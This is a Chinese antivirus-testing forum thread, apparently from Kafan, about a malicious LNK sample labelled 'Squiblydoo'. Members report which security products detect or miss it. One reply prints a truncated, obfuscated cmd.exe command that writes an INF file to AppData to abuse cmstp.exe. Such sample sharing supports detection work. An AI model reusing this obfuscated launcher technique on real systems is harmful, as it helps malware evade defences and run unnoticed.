搜索
查看: 915|回复: 12
收起左侧

[病毒样本] Squiblydoo (19.07.25)

[复制链接]
Jerry.Lin
发表于 2019-7-25 20:39:13 | 显示全部楼层 |阅读模式



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
Jirehlov1234 + 1 刚想发来着

查看全部评分

www-tekeze
发表于 2019-7-25 21:03:15 | 显示全部楼层
绒智均MISS,有空双击。。


ELOHIM
发表于 2019-7-25 21:20:53 | 显示全部楼层
%SystemRoot%\system32\cmd.exe /v /c set o5=s&& !o5!et "h7=d" && call !o5!et "m6=%APP!h7!ATA%\Micro!o5!oft\%RAN!h7!OM%.txt" && set "m8="^" && (For %i in ("[ver!o5!ion]" "!o5!ignature=$WiNdow!o5! NT$" "[DefaultInstall_SingleU!o5!er]" "UnRegisterOCXs=A916" "[A91



scan miss
www-tekeze
发表于 2019-7-25 21:24:33 | 显示全部楼层
本帖最后由 www-tekeze 于 2019-7-25 21:33 编辑
www-tekeze 发表于 2019-7-25 21:03
绒智均MISS,有空双击。。

双击,由cmd启动系统程序cmstp.exe,然后联网,绒智主防均无反应。

但没任何流量,补个图,不知被墙了还是咋的。。。PS:启动绒智快速扫描也无发现。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
j2016
发表于 2019-7-25 22:30:21 | 显示全部楼层
过360扫描,双击,有风险程序
温馨小屋
发表于 2019-7-25 22:34:14 | 显示全部楼层
Kaspersky


25.07.2019 22.33.59;检测到的对象 ( 文件 ) 已删除;Z:\statement_02_2019.lnk\statement_02_2019.lnk;Z:\statement_02_2019.lnk\statement_02_2019.lnk;HEUR:Trojan.WinLNK.Agent.gen
温馨小屋
发表于 2019-7-25 22:36:18 | 显示全部楼层
静影沉璧 发表于 2019-7-25 21:42
https://www.hybrid-analysis.com/sample/3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32 ...


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
桑德尔
发表于 2019-7-26 08:47:24 | 显示全部楼层
ESET Miss
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|卡饭乐购| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2019-9-17 21:02 , Processed in 0.055198 second(s), 7 queries , MemCache On.

快速回复 返回顶部 返回列表